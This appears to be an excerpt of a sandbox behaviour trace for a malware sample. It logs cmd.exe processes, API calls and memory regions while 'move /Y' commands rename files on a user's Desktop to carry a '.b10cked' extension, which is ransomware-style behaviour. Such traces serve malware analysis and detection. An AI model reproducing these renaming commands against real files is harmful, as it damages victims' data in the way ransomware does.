returned -13 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.488] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0220.488] _wcsicmp (_String1="Bwuwh.wav", _String2=".") returned 52 [0220.488] _wcsicmp (_String1="Bwuwh.wav", _String2="..") returned 52 [0220.488] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav" (normalized: "c:\\users\\eebsym5\\desktop\\bwuwh.wav")) returned 0x20 [0220.488] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2a1d28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.488] SetErrorMode (uMode=0x0) returned 0x0 [0220.488] SetErrorMode (uMode=0x1) returned 0x0 [0220.488] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav", nBufferLength=0x104, lpBuffer=0x1cf13c, lpFilePart=0x1cf124 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav", lpFilePart=0x1cf124*="Bwuwh.wav") returned 0x22 [0220.488] SetErrorMode (uMode=0x0) returned 0x1 [0220.489] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.489] _wcsicmp (_String1="Bwuwh.wav", _String2=".") returned 52 [0220.489] _wcsicmp (_String1="Bwuwh.wav", _String2="..") returned 52 [0220.489] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav" 
(normalized: "c:\\users\\eebsym5\\desktop\\bwuwh.wav")) returned 0x20 [0220.489] SetErrorMode (uMode=0x0) returned 0x0 [0220.489] SetErrorMode (uMode=0x1) returned 0x0 [0220.489] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav", nBufferLength=0x104, lpBuffer=0x1cf5b8, lpFilePart=0x1cf350 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav", lpFilePart=0x1cf350*="Bwuwh.wav") returned 0x22 [0220.489] SetErrorMode (uMode=0x0) returned 0x1 [0220.489] SetErrorMode (uMode=0x0) returned 0x0 [0220.489] SetErrorMode (uMode=0x1) returned 0x0 [0220.489] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked", nBufferLength=0x104, lpBuffer=0x1cf7c0, lpFilePart=0x1cf350 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked", lpFilePart=0x1cf350*="Bwuwh.wav.b10cked") returned 0x2a [0220.489] SetErrorMode (uMode=0x0) returned 0x1 [0220.489] SetLastError (dwErrCode=0x0) [0220.489] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\bwuwh.wav.b10cked")) returned 0xffffffff [0220.489] GetLastError () returned 0x2 [0220.489] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav", fInfoLevelId=0x1, lpFindFileData=0x1ceccc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceccc) returned 0x2a2198 [0220.489] FindNextFileW (in: hFindFile=0x2a2198, lpFindFileData=0x1ceccc | out: lpFindFileData=0x1ceccc) returned 0 [0220.490] GetLastError () returned 0x12 [0220.490] FindClose (in: hFindFile=0x2a2198 | out: hFindFile=0x2a2198) returned 1 [0220.491] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav", fInfoLevelId=0x1, lpFindFileData=0x2a1ac8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2a1ac8) returned 0x2a2198 [0220.491] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked", nBufferLength=0x104, lpBuffer=0x1cef64, 
lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked", lpFilePart=0x0) returned 0x2a [0220.491] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav", nBufferLength=0x104, lpBuffer=0x1cef64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav", lpFilePart=0x0) returned 0x22 [0220.491] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav" (normalized: "c:\\users\\eebsym5\\desktop\\bwuwh.wav")) returned 0x20 [0220.491] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav" (normalized: "c:\\users\\eebsym5\\desktop\\bwuwh.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\bwuwh.wav.b10cked"), dwFlags=0x3) returned 1 [0220.491] FindClose (in: hFindFile=0x2a2198 | out: hFindFile=0x2a2198) returned 1 [0220.492] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1cef18 | out: _Buffer=" 1") returned 9 [0220.492] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.492] GetFileType (hFile=0x7) returned 0x2 [0220.492] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.492] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ceea4 | out: lpMode=0x1ceea4) returned 1 [0220.492] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.492] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ceed8 | out: lpConsoleScreenBufferInfo=0x1ceed8) returned 1 [0220.492] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0220.492] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x1cef18 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0220.493] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x1ceefc, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x1ceefc*=0x1a) returned 1 [0220.493] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.493] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.493] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.493] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.493] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.493] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.493] SetConsoleInputExeNameW () returned 0x1 [0220.493] GetConsoleOutputCP () returned 0x1b5 [0220.493] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.493] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.494] exit (_Code=0) Process: id = "576" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c80" os_pid = "0x520" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV\" \"C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32924 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32925 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000030000" filename = "" Region: id = 32926 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32927 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 32928 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32929 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32930 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32931 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32932 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32933 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33248 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33249 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33250 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: 
"c:\\windows\\system32\\locale.nls") Region: id = 33251 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 33252 start_va = 0x650000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 33253 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33254 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33255 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33256 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33257 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33258 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33259 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33260 start_va = 0x773e0000 end_va = 0x7742dfff 
entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33261 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33262 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33263 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33264 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33265 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 33266 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 33267 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 33268 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 33269 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 33270 start_va = 0x660000 end_va = 0x125ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 33271 start_va = 0x1260000 end_va = 0x13c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001260000" filename = 
"" Thread: id = 780 os_tid = 0xf58 [0220.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef9e4 | out: lpSystemTimeAsFileTime=0x2ef9e4*(dwLowDateTime=0xb874ebe0, dwHighDateTime=0x1d440a9)) [0220.885] GetCurrentProcessId () returned 0x520 [0220.885] GetCurrentThreadId () returned 0xf58 [0220.885] GetTickCount () returned 0x3da18 [0220.885] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef9dc | out: lpPerformanceCount=0x2ef9dc*=27767406477) returned 1 [0220.886] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.886] __set_app_type (_Type=0x1) [0220.886] __p__fmode () returned 0x76b331f4 [0220.886] __p__commode () returned 0x76b331fc [0220.886] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.886] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.886] GetCurrentThreadId () returned 0xf58 [0220.886] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf58) returned 0x38 [0220.886] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.886] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.886] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.886] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.886] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef974 | out: phkResult=0x2ef974*=0x0) returned 0x2 [0220.887] VirtualQuery (in: lpAddress=0x2ef9ab, lpBuffer=0x2ef944, dwLength=0x1c | out: lpBuffer=0x2ef944*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.887] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef944, 
dwLength=0x1c | out: lpBuffer=0x2ef944*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.887] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef944, dwLength=0x1c | out: lpBuffer=0x2ef944*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.887] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef944, dwLength=0x1c | out: lpBuffer=0x2ef944*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.887] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef944, dwLength=0x1c | out: lpBuffer=0x2ef944*(BaseAddress=0x2f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0220.887] GetConsoleOutputCP () returned 0x1b5 [0220.887] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.887] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.887] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.887] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.887] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.887] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.888] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.888] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.888] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.888] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.888] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.888] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.888] GetEnvironmentStringsW () returned 0x3e0168* [0220.888] FreeEnvironmentStringsW (penv=0x3e0168) returned 1 [0220.889] 
GetEnvironmentStringsW () returned 0x3e0168* [0220.889] FreeEnvironmentStringsW (penv=0x3e0168) returned 1 [0220.889] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee8e4 | out: phkResult=0x2ee8e4*=0x40) returned 0x0 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x0, lpData=0x2ee8f0*=0x90, lpcbData=0x2ee8e8*=0x1000) returned 0x2 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x4, lpData=0x2ee8f0*=0x1, lpcbData=0x2ee8e8*=0x4) returned 0x0 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x0, lpData=0x2ee8f0*=0x1, lpcbData=0x2ee8e8*=0x1000) returned 0x2 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x4, lpData=0x2ee8f0*=0x0, lpcbData=0x2ee8e8*=0x4) returned 0x0 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x4, lpData=0x2ee8f0*=0x40, lpcbData=0x2ee8e8*=0x4) returned 0x0 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x4, lpData=0x2ee8f0*=0x40, lpcbData=0x2ee8e8*=0x4) returned 0x0 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x0, lpData=0x2ee8f0*=0x40, lpcbData=0x2ee8e8*=0x1000) returned 0x2 [0220.889] 
RegCloseKey (hKey=0x40) returned 0x0 [0220.889] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee8e4 | out: phkResult=0x2ee8e4*=0x40) returned 0x0 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x0, lpData=0x2ee8f0*=0x40, lpcbData=0x2ee8e8*=0x1000) returned 0x2 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x4, lpData=0x2ee8f0*=0x1, lpcbData=0x2ee8e8*=0x4) returned 0x0 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x0, lpData=0x2ee8f0*=0x1, lpcbData=0x2ee8e8*=0x1000) returned 0x2 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x4, lpData=0x2ee8f0*=0x0, lpcbData=0x2ee8e8*=0x4) returned 0x0 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x4, lpData=0x2ee8f0*=0x9, lpcbData=0x2ee8e8*=0x4) returned 0x0 [0220.889] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x4, lpData=0x2ee8f0*=0x9, lpcbData=0x2ee8e8*=0x4) returned 0x0 [0220.890] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee8ec, lpData=0x2ee8f0, lpcbData=0x2ee8e8*=0x1000 | out: lpType=0x2ee8ec*=0x0, lpData=0x2ee8f0*=0x9, lpcbData=0x2ee8e8*=0x1000) returned 0x2 [0220.890] RegCloseKey (hKey=0x40) returned 0x0 [0220.890] time (in: timer=0x0 | out: 
timer=0x0) returned 0x5b8863b6 [0220.890] srand (_Seed=0x5b8863b6) [0220.890] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV\" \"C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked\"" [0220.890] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV\" \"C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked\"" [0220.890] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.890] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.890] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.891] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.891] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.891] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.891] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.891] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.891] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.891] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.891] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.891] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.891] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.891] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.891] 
GetEnvironmentStringsW () returned 0x3e22b8* [0220.891] FreeEnvironmentStringsW (penv=0x3e22b8) returned 1 [0220.891] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.891] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.891] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.891] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.891] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.891] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.891] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.891] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.891] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.891] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.892] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef6b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.892] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef6b0, lpFilePart=0x2ef6ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef6ac*="Desktop") returned 0x18 [0220.892] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.892] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef42c | out: lpFindFileData=0x2ef42c) returned 0x3dfff8 